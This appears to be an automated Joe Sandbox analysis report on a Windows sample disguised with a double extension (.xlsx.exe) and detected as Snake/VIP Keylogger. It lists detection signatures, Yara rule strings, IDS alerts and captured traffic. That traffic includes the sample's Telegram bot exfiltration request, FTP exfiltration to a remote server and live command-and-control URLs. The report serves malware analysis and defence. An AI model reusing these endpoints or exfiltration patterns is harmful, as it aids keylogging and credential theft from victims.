Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DC74433Y7889021.xlsx.exe

Overview

General Information

Sample name:DC74433Y7889021.xlsx.exe
Analysis ID:1474973
MD5:6fd5c95f3bc8ac876f1babed1b839dcd
SHA1:b35d7e77ac643ab5d9bbe7442553aa82ac1379c3
SHA256:d1fcbf364ad31af81a9612d9633e1b6598375983354390bfaa32b5ea5a7c3a6d
Tags:exe
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Sigma detected: Suspicious Double Extension File Execution
Snort IDS alert for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code references suspicious native API functions
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DC74433Y7889021.xlsx.exe (PID: 2488 cmdline: "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe" MD5: 6FD5C95F3BC8AC876F1BABED1B839DCD)
    • DC74433Y7889021.xlsx.exe (PID: 2992 cmdline: "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe" MD5: 6FD5C95F3BC8AC876F1BABED1B839DCD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d39e:$a1: get_encryptedPassword
        • 0x2d6bb:$a2: get_encryptedUsername
        • 0x2d1ae:$a3: get_timePasswordChanged
        • 0x2d2b7:$a4: get_passwordField
        • 0x2d3b4:$a5: set_encryptedPassword
        • 0x2e9f6:$a7: get_logins
        • 0x2e959:$a10: KeyLoggerEventArgs
        • 0x2e5ec:$a11: KeyLoggerEventArgsEventHandler
        00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 14 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                1.2.DC74433Y7889021.xlsx.exe.500000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  1.2.DC74433Y7889021.xlsx.exe.500000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    Click to see the 34 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious Double Extension File Execution
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe", CommandLine: "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe, NewProcessName: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe, OriginalFileName: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe", ProcessId: 2488, ProcessName: DC74433Y7889021.xlsx.exe

                    Snort Signatures

                    Timestamp:07/17/24-14:17:22.648999
                    SID:2845532
                    Source Port:49756
                    Destination Port:21
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Suricata Signatures

                    Timestamp:2024-07-17T14:17:08.911771+0200
                    SID:2803305
                    Source Port:49742
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-17T14:19:21.508196+0200
                    SID:2845532
                    Source Port:49756
                    Destination Port:21
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-17T14:17:11.365188+0200
                    SID:2803305
                    Source Port:49747
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-17T14:17:05.037579+0200
                    SID:2803274
                    Source Port:49730
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:2024-07-17T14:17:58.639130+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:49763
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-17T14:17:20.554901+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:49753
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-17T14:17:05.614505+0200
                    SID:2803305
                    Source Port:49735
                    Destination Port:443
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-07-17T14:17:06.146860+0200
                    SID:2803274
                    Source Port:49736
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: DC74433Y7889021.xlsx.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: malware
                    Source: http://aborters.duckdns.org:8081Avira URL Cloud: Label: malware
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: DC74433Y7889021.xlsx.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: DC74433Y7889021.xlsx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2
                    Source: DC74433Y7889021.xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688208679.0000000005620000.00000004.08000000.00040000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000000.00000002.1686646737.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4136425444.0000000005C99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdbt source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4136425444.0000000005C99000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 023BF45Dh1_2_023BF2C0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 023BF45Dh1_2_023BF4AC
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 023BFC19h1_2_023BF961
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060E0D0Dh1_2_060E0B30
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060E1697h1_2_060E0B30
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060E2C19h1_2_060E2968
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060E31E0h1_2_060E2DC8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060EE0A9h1_2_060EDE00
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060EE501h1_2_060EE258
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_060E0673
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060EE959h1_2_060EE6B0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060EEDB1h1_2_060EEB08
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060EF209h1_2_060EEF60
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060EF661h1_2_060EF3B8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060EFAB9h1_2_060EF810
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_060E0040
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_060E0853
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060ECF49h1_2_060ECCA0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060ED3A1h1_2_060ED0F8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060E31E0h1_2_060E310E
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060ED7F9h1_2_060ED550
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060EDC51h1_2_060ED9A8
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 4x nop then jmp 060E31E0h1_2_060E2DC2

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2845532 ETPRO TROJAN SnakeKeylogger Exfil via FTP M1 192.168.2.4:49756 -> 213.189.52.181:21
                    Connects to many ports of the same IP (likely port scanning)
                    Source: global trafficTCP traffic: 213.189.52.181 ports 64212,63014,64119,1,2,21
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:49759 -> 213.189.52.181:64212
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20and%20Time:%2017/07/2024%20/%2019:03:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20562258%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: ECO-ATMAN-PLECO-ATMAN-PL ECO-ATMAN-PLECO-ATMAN-PL
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: unknownFTP traffic detected: 213.189.52.181:21 -> 192.168.2.4:49756 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 150 allowed.220-Local time is now 14:17. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 150 allowed.220-Local time is now 14:17. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 19 of 150 allowed.220-Local time is now 14:17. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20and%20Time:%2017/07/2024%20/%2019:03:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20562258%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficDNS traffic detected: DNS query: s4.serv00.com
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 17 Jul 2024 12:17:14 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
